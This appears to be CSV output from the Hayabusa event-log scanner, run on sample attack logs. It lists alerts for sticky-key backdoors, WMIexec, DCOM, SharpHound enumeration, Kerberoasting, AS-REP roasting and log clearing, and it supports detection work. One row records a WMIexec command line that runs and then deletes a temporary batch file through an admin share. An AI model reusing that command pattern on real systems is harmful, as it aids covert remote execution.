2021-04-26 18:16:14.118 +09:00,srvdefender01.offsec.lan,12,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 18:16:14.119 +09:00,srvdefender01.offsec.lan,13,medium,CurrentVersion NT Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion_nt.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID12,13-Stickey key registry update.evtx"
2021-04-26 19:04:23.189 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1546-Image File Execution Options Injection/ID4656-Failed sethc replacement by CMD.evtx
2021-04-27 00:03:05.992 +09:00,fs02.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1015,technique_name=Accessibility Features  :  Command: C:\Windows\system32\cmd.exe  /Q /c C:\Windows\TEMP\execute.bat   :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\cmd.exe /Q /c echo cd  ^> \\127.0.0.1\C$\__output 2^>^&1 > C:\Windows\TEMP\execute.bat & C:\Windows\system32\cmd.exe /Q /c C:\Windows\TEMP\execute.bat & del C:\Windows\TEMP\execute.bat",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMIexec process execution.evtx
2021-04-27 00:16:03.978 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 47450  :  LogonID: 0x5429550,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:03.992 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 34544  :  LogonID: 0x542957e,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 00:16:04.284 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig  :  Workstation: -  :  IP Address: 10.23.123.11  :  Port: 45246  :  LogonID: 0x542a072,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.003-Distributed Component Object Model (DCOM)/ID4688,4674-DCOMexec process spawned.evtx"
2021-04-27 20:04:13.291 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 20:04:53.341 +09:00,rootdc1.offsec.lan,5136,high,Possible DC Shadow,,rules/sigma/builtin/security/win_possible_dc_shadow.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4742,4935,4662,4661,5137-DCshadow attack (GLOBAL) failed.evtx"
2021-04-27 23:54:29.317 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:31.493 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:49.355 +09:00,webiis01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:54:51.591 +09:00,pki01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:28.669 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:34.819 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.042 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:45.392 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:46.789 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:47.449 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:48.746 +09:00,mssql01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:49.695 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:50.629 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-27 23:59:54.886 +09:00,atanids01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.147 +09:00,exchange01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:05.466 +09:00,adfs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:06.878 +09:00,fs01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:07.557 +09:00,prtg-mon.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:09.605 +09:00,srvdefender01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:00:10.730 +09:00,atacore01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.723 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.762 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.790 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:17.920 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:18.001 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:20.658 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:30.691 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.825 +09:00,fs02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.866 +09:00,dhcp01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.904 +09:00,wsus01.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.916 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:37.917 +09:00,win10-02.offsec.lan,5140,informational,Network Share Access,User: admmig  :  Share Name: \\*\IPC$  :  Share Path: null  :  IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:40.730 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:03:50.745 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:00.785 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-28 00:04:10.808 +09:00,dhcp01.offsec.lan,5145,informational,Network Share File Access,User: svc_nxlog  :  Share Name: \\*\dhcp_logs$  :  Share Path: \??\C:\DHCP_LOGS  :  File: DhcpSrvLog-Wed.log  :  IP Address: 10.23.42.22,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID5140-5145-Bloodhound-SharpHound enumeration via SMB.evtx
2021-04-29 16:55:53.423 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.433 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.435 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.436 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54633  :  LogonID: 0xc66373,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.681 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Bob@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4672,informational,Admin Logon,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.683 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Bob  :  Workstation:   :  IP Address: 192.168.1.2  :  Port: 54635  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,medium,Possible AS-REP Roasting,Possible AS-REP Roasting,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_AS-REP-Roasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.869 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.2  :  Status: 0x0  :  PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:56:26.980 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Bob  :  LogonID: 0xc66389,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.652 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54374  :  LogonID: 0xc712f1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.666 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: 192.168.1.100  :  Port: 54375  :  LogonID: 0xc7142b,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:02.761 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54376  :  LogonID: 0xc714d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.422 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: DC-SERVER-1$@LABCORP.LOCAL  :  Service: DC-SERVER-1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:58:28.425 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54379  :  LogonID: 0xc7313f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.537 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54388  :  LogonID: 0xc7adb8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 16:59:42.545 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: DC-SERVER-1$  :  Workstation:   :  IP Address: fe80::e50e:b89e:4718:3aa  :  Port: 54389  :  LogonID: 0xc7ae25,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.004_Steal or Forge Kerberos Tickets AS-REP Roasting/Security.evtx
2021-04-29 18:23:54.244 +09:00,DC-Server-1.labcorp.local,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.690 +09:00,DC-Server-1.labcorp.local,4776,informational,NTLM Logon to Local Account,User: Alice  :  Workstation   :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.691 +09:00,DC-Server-1.labcorp.local,4624,informational,Logon Type 3 - Network,User: Alice  :  Workstation:   :  IP Address: 192.168.1.200  :  Port: 40316  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,medium,Kerberoasting,Possible Kerberoasting Risk Activity.,rules/hayabusa/default/alerts/Security/4768_StealOrForgeKerberosTickets_Kerberoasting.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.718 +09:00,DC-Server-1.labcorp.local,4768,informational,Kerberos TGT was requested,User: Alice  :  Service: krbtgt  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.726 +09:00,DC-Server-1.labcorp.local,4769,informational,Kerberos Service Ticket Requested,User: Alice@LABCORP.LOCAL  :  Service: sql101  :  IP Address: ::ffff:192.168.1.200  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
2021-04-29 18:23:58.735 +09:00,DC-Server-1.labcorp.local,4634,informational,Logoff,User: Alice  :  LogonID: 0x27d676,rules/hayabusa/default/events/Security/Logons/4634_Logoff.yml,../hayabusa-sample-evtx/YamatoSecurity/T1558.003_Steal or Forge Kerberos Tickets Kerberoasting/Security.evtx
